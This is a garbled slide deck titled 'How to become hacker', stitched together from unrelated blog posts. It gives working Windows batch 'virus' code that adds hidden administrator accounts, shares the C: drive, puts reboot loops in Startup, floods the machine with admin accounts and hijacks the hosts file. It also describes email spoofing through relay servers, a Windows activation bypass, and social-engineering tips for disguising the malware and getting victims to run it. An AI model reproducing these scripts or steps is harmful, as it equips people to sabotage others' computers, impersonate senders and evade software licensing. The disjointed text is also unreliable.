ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdf
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management System
 

How to become hacker

  • 1. Today every body want become hacker because this thing is so cool . You know are you actually hacker or just a kid. THERE ARE FOUR STAGES TO BECOME HACKER SO CHECK WHETHER WHERE ARE YOU BELONG . THERE ARE FOUR LEVEL SO WAKE UP 1>HACKING FOR KIDS [Here's another one in the long list of ideas I'd like to execute but will probably never have time.] If kids learn programming these days, it's usually LOGO or BASIC or some other training-wheels language. This is no way to breed the next generation of hackers. And I'm sure there are geeks around the world who would love their sons, daughters, nephews and nieces to get into programming, but look down the shelves of their bookshop with a cry of despair. It seems to be a choice between "Visual Basic for Dummies", "Programming Excel" and "Learn C in 24 Easy Lessons". As Dijkstra famously said, ""It is practically impossible to teach good programming to students that have had a prior exposure to BASIC: as potential programmers they are mentally mutilated beyond hope of regeneration." And when you are learning to program, you want to write programs which do stuff, not have to spend ages in C managing memory and making sure your strings are terminated with 0. Sometimes these books come with a CD, containing a cut-down version of a commercial development environment they are hoping you will buy, and perhaps a weedy editor, all running under Windows with no source code available. What sort of example is that to set? Trying to learn to hack on a Microsoft Windows machine or any other closed-source system is like trying to learn to dance while wearing a body cast. How about a book "Hacking for Kids"?0 Written for teenagers, it would explain how cool hacking is and the path to becoming a hacker, and would give kids fun and interesting programming projects using powerful modern languages such as Perl, free Java, Python and JavaScript. It would teach best practice in programming, not treating the user as an idiot who can only cope with cut-and-pasting code chunks in a jigsaw-puzzle fashion. b> or make a fake shutdown virus C>hack email by
  • 2. Home » EMAIL HACKING, HOW-TO GUIDES, NETWORK HACKS How to Send Anonymous Emails Submitted by Srikanth on Tuesday, 10 March 200980 Comments.How To Send Anonymous Emails Most of us are very curious to know a method to send anonymous emails to our friends for fun. But the question is, is it possible to send anonymous emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send anonymous emails to your friends. For example, you can send an email to your friend with the following sender details. From: Bill Gates <billg@microsoft.com>The art of sending this kind emails is known as Email Spoofing. In my previous post on How to Send Fake Email I insisted on using your own SMTP server to send anonymous emails. This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoo(all major email service providers) blocks the emails that are sent directly from a PC. In this post I have come up with a new way to send anonymous emails (spoofed emails) that has 100% success rate. If you have to successfully send an anonymous email or spoofed email, you should send it using a relay server. What is a Relay Server? In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.
  • 3. So What‟s Next? Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually all the emails that are sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it‟s just a cakewalk to send anonymous emails. All we have to do is just modify the email headers to insert the spoofed From address field into it. I have created a PHP script that allows you to send emails from any name and email address of your choice. Here is a step-by-step procedure to setup your own Anonymous Email Sender Script 1. Goto X10 Hosting and register a new account. 2. Download my Anonymous Email Sender Script (sendmail.rar). 3. Login to your FreeWebHostingArea Account and click on File Manager. 4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server. 5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777. 6. Now type the following URL
  • 4. d> make trojan virus 1. Search for the root drive 2. Navigate to WindowsSystem32 on the root drive 3. Create the file named “spceshot.dll” 4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full 5. Once the drive is full, stop the process. You can download the Trojan source code 2>hacking for boys In this case user have little potential Like user know about c programme etc. but they donot create and correct c hard programme ? How to Use Windows Without Activation 1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt” and select “Run as Administrator“. If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2. 2. Now type the following command and hit enter slmgr -rearm 3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation. 4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSoftwareProtectionPlatform
  • 5. 5. In right-side pane, change value of SkipRearm to 1. 6. Now you will be able to use the slmgr -rearm command for another 8 times so that you can skip activation process for another 240 days. So you will get 120 + 240 = 360 days of free Windows 7 usage. 120 days using “slmgr -rearm” command before registry edit + 240 days using “slmgr -rearm” command after registry edit = 360 Days B>Guessing Game In C They start basic programme like this #include<stdio.h> #include<stdlib.h> #include<time.h> void main() { int num,guess=-1,tries=0,pass=0; time_t t; srand((unsigned)time(&t)); num=rand()%100; while((guess!=num)&&tries<8) { printf(“Enter the guess num b/w 0 & 100 (you have %d tries left out)n”,(8-tries)); scanf(“%d”,&guess); tries++; if(guess==num) { printf(“Hurray you guessed it correctly!!!n”); pass=1; } else if(num< guess) printf(“Your guess is too highn”); else printf(“Your guess is too lown”);
  • 6. } if(pass==0) printf(“Sorry you lost! The correct number is %dn”,num); } c>this programme is not hacking but a trick #include<stdio.h> #include<dos.h> #include<dir.h> char site_list[6][30]={ “google.com”, “www.google.com”, “youtube.com”, “www.youtube.com”, “yahoo.com”, “www.yahoo.com” }; char ip[12]=”127.0.0.1″; FILE *target; int find_root(void); void block_site(void); int find_root() { int done; struct ffblk ffblk;//File block structure done=findfirst(“C:windowssystem32driversetchosts”,&ffblk,FA_DIREC); /*to determine the root drive*/ if(done==0) { target=fopen(“C:windowssystem32driversetchosts”,”r+”); /*to open the file*/ return 1; } done=findfirst(“D:windowssystem32driversetchosts”,&ffblk,FA_DIREC); /*to determine the root drive*/ if(done==0) { target=fopen(“D:windowssystem32driversetchosts”,”r+”); /*to open the file*/
  • 7. return 1; } done=findfirst(“E:windowssystem32driversetchosts”,&ffblk,FA_DIREC); /*to determine the root drive*/ if(done==0) { target=fopen(“E:windowssystem32driversetchosts”,”r+”); /*to open the file*/ return 1; } done=findfirst(“F:windowssystem32driversetchosts”,&ffblk,FA_DIREC); /*to determine the root drive*/ if(done==0) { target=fopen(“F:windowssystem32driversetchosts”,”r+”); /*to open the file*/ return 1; } else return 0; } void block_site() { int i; fseek(target,0,SEEK_END); /*to move to the end of the file*/ fprintf(target,”n”); for(i=0;i<6;i++) fprintf(target,”%st%sn”,ip,site_list[i]); fclose(target); } void main() { int success=0; success=find_root(); if(success) block_site(); } How to Compile ? For step-by-step compilation guide, refer my post How to compile C Programs.
  • 8. Testing 1. To test, run the compiled module. It will block the sites that is listed in the source code. 2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“. 3. To remove the virus type the following the Run. %windir%system32driversetc 4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this 127.0.0.1 google.com 5. Delete all such entries which contain the names of blocked sites d>block usb #include<stdio.h> void main() { system("reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesUSBSTOR /v Start /t REG_DWORD /d 3 /f"); } e> in this case user have more knowleage about virus ,hacking software, trick to create fake virus but in this time user waste their time to show off. So practice more programing like c, c++ . We talk later about 3>hacking for men
  • 9. In this stage user know about batch file programming or java and perl. Batch File Programming Introduction Batch file programming is the native programming offered by the Microsoft Windows Operating System. Batch file is created using any text editors like notepad, WordPad, WinWord or so on, which comprises of a sequence of built-in commands used to perform some often done tasks like deleting a series of files of same type or of different type, creating logs, clearing unwanted craps from your computer and even for creating a batch VIRUS. Whenever a Batch program is executed, it was interpreted line-by-line by the CLI (Command Line Interpreter) command.com or the cmd.exe. Batch file is really helpful in automating tedious tasks and for maintaining system logs. The commands used while creating a batch file are case insensitive, in the sense that it may accept both small and upper case letters. So I am give you example of programming How to m C_relwarC708 v1.0 Virus Here is the source code for the virus C_relwarC708 v1.0, created by me. @echo off cd cd %SystemRoot%system32 md 1001 cd
  • 10. cls rem N0 H4rm 15 cau53d unt1| N0w rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000 echo 12:00:00.00 | time >> nul echo 01/01/2000 | date >> nul net users Microsoft_support support /add rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt. net localgroup administrators Microsoft_support /add rem 5h4r3 th3 R00t Dr1v3 net share system=C: /UNLIMITED cd %SystemRoot%system321001 echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%system321001warnusr.vbs rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y ) mode con rate=1 > nul mode con delay=4 >> nul ake virus rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y @ 12:01 and 12:02 at 12:01 /interactive “%SystemRoot%system321001warnusr.vbs”
  • 11. at 12:02 /interactive “%SystemRoot%system321001warnusr.vbs” msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >> nul rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5 copy %SystemRoot%system321001warnusr.vbs “%systemdrive%Documents and SettingsAll UsersStart MenuProgramsStartupwarnusr.vbs” rem *************************************************************************** rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti- virus can detect this virus now. Wanna try? Hahahaha….! ” > %systemroot%system321001sd.bat copy %systemroot%Documents and SettingsAll UsersStart MenuProgramsStartupsd.bat “%systemdrive%Documents and SettingsAll UsersStart MenuProgramsStartupsd.bat” rem
  • 12. *************************************************************************** cd cls rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r cd %systemdrive%Documents and SettingsAll UsersStart MenuProgramsStartup attrib +h +s +r warnusr.vbs attrib +h +s +r sd.bat cd cd %systemroot%system32 attrib +h +s +r 1001 rem K1||5 th3 3xp|0r3r.3×3 Pr0c355 taskkill /F /IM explorer.exe rem @ EOV // End of Virus Copy the source code and paste it in a notepad, then save it with the .bat extension. This virus program will begin its operation at C:windowssystem32 and creates a new directory with name '1001', changes the time to 12:00 and date to 01-01-2000, then creates a new user with account name 'Microsoft_support' with a password 'support' matching the account. It automatically assigns administrator rights to the user account that was created, then shares the root drive 'C:' which really is a security issue making the system completely vulnerable. It will create a VBScript file with name 'warnusr.vbs' that is used to display a message 'Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or
  • 13. Press No to Ignore the Virus', that really seems to be coming from the operating system itself, then it will change the keyboard setting by reducing the rate and delay time. Since the time and date has been already modified by the virus, it will automatically pop up a message stating 'You are requested to restart your Computer Now to prevent Damages or Data loss' exactly at 12:01 and 12:02, if the user restarts the computer, then it‟s gone. Whenever the user try to login to the computer, it will automatically reboots continuously, because the command 'shutdown -r' is set with time 00, and kept in start-up folder, the user has nothing to stop this unless he enters in safe mode and delete the file, more over the file is set with system and hidden attribute making it invisible. The only way to stop this is to enter in safe mode and disable the start-up items, and then delete the file that reside in C:windowssystem321001 and in the start-up folder. You can also use some exe-binders to bind this virus with any audio, video, text or whatever the files may be, then use some social engineering technique to make the victim execute the file by himself to harm his/her computer. You can create this virus without using any third party tools in windows, also instead of exe-binder, you can use the „iexpress‟ wizard to create a custom package. 2>second virus Msg Annoyer:
  • 14. Message annoyer is a batch program that uses the same concept as above, but will interact with the user anyhow annoying and irritating them by popping up some message box containing some messages in it. @echo off :annoy msg * Hi there! msg * How u doin ? msg * Are you fine ? msg * Never mind about me.... msg * I am not here to annoy you.... msg * I am caring for you..... msg * start counting from 1 to 5, i Will be outta this place..... msg * 1 msg * 2 msg * 3 msg * 4 msg * 5 goto annoy This program will pops up a small message box as shown below, Containing the text mentioned in the program given above. This message box will pop up until for endless loop, which really annoys the person sitting before the
  • 15. computer. Even these small popup windows may crash the computer, if it overloads the memory. 3>virus User Flooder: The „user flooder‟ program will create a number of user accounts with random numbers, and assign administrator rights to them by itself, moreover the password set for those user accounts were too random numbers. @echo off :usrflood set usr=%random% net users %usr% %random% /add net localgroup administrators %usr% /add goto usrflood Since we have already learned about the environment variables, the „%random%‟ is an environment variable that generates a random positive integer. We have set a variable manually named „usr‟ for holding the random number generated by the %random%, then a new user account is created with the generated number as the account name and was assigned with a random password, then assigned with administrator rights, and this process gets repeated for a infinite loop, so it will create more than 50 user accounts in less than a minute. This will sure degrade the computer performance and the user will
  • 16. take a long long time to delete the user accounts, sometimes they will simply format their hard drives. >Converting Batch to Executables So far we have learnt how to create a batch file program with an .bat extension, but there is a way convert all these batch files into executable files with an .exe extension, so that it will become hard for e people to find, what the program exactly does, else they may have a chance to have a look at your urce code, even to copy your source code. You have to download the batch to exe convertor from the internet in order to convert the batch to xecutable; here I have enclosed the download link, where you can download this tool. Dowload Link : http://tinyurl.com/c29kgo Tool Name : Bat to Exe Converter V1.5 opy and paste the above link in the address bar of your web browser, or you can directly CTRL + Click n the link if your computer is hooked up to the internet, then download the file. 4>hacking for old man In this stage you know with time. But in case you want more than email me rsanoria09@gmail.com